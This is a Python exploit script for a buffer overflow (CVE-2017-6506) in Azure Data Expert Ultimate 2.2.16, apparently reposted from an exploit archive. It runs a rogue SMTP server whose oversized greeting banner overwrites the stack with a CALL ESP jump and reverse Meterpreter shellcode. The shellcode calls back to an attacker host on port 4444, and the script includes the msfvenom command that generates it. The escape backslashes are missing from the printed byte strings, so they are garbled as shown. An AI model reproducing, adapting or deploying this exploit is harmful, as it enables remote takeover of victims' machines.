Azure Data Expert Ultimate 2.2.16 Buffer Overflow
Posted on 08 March 2017
# Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow # Date: 2017-03-07 # Exploit Author: Peter Baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: http://www.azuredex.com/downloads.html # Version: 2.2.16 # Tested on: Windows Server 2008 R2 Standard x64 # CVE : CVE-2017-6506 # The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts. import socket # QtGui4.dll 0x6527635E - CALL ESP jmp = "x5ex63x27x65" nops = "x90"*8 # reverse meterpreter shell 306 bytes long bad chars x00x0ax0bx20 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b x00x0ax0dx20 --smallest rev_met_1=("x6ax47x59xd9xeexd9x74x24xf4x5bx81x73x13x1fx2d" "x97x97x83xebxfcxe2xf4xe3xc5x15x97x1fx2dxf7x1e" "xfax1cx57xf3x94x7dxa7x1cx4dx21x1cxc5x0bxa6xe5" "xbfx10x9axddxb1x2exd2x3bxabx7ex51x95xbbx3fxec" "x58x9ax1exeax75x65x4dx7ax1cxc5x0fxa6xddxabx94" "x61x86xefxfcx65x96x46x4exa6xcexb7x1exfex1cxde" "x07xcexadxdex94x19x1cx96xc9x1cx68x3bxdexe2x9a" "x96xd8x15x77xe2xe9x2exeax6fx24x50xb3xe2xfbx75" "x1cxcfx3bx2cx44xf1x94x21xdcx1cx47x31x96x44x94" "x29x1cx96xcfxa4xd3xb3x3bx76xccxf6x46x77xc6x68" "xffx72xc8xcdx94x3fx7cx1ax42x45xa4xa5x1fx2dxff" "xe0x6cx1fxc8xc3x77x61xe0xb1x18xd2x42x2fx8fx2c" "x97x97x36xe9xc3xc7x77x04x17xfcx1fxd2x42xfdx1a" "x45x57x3fxd9xadxffx95x1fx3cxcbx1exf9x7dxc7xc7" "x4fx6dxc7xd7x4fx45x7dx98xc0xcdx68x42x88x47x87" "xc1x48x45x0ex32x6bx4c") rev_met_2=("x68x42x9axedxe3x9bxe0x63" "x9fxe2xf3x45x67x22xbdx7bx68x42x75x2dxfdx93x49" "x7axffx95xc6xe5xc8x68xcaxa6xa1xfdx5fx45x97x87" "x1fx2dxc1xfdx1fx45xcfx33x4cxc8x68x42x8cx7exfd" "x97x49x7exc0xffx1dxf4x5fxc8xe0xf8x96x54x36xeb" "xe2x79xdcx2dx97x97") buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1 port = 25 s = socket.socket() ip = '0.0.0.0' s.bind((ip, port)) s.listen(5) print 'Listening on SMTP port: '+str(port) if len(rev_met_1) >= 236: print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.') exit(1) elif len(rev_met_2) >= 76: print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.') exit(1) while True: conn, addr = s.accept() conn.send('220 '+buffer+' ') conn.close()
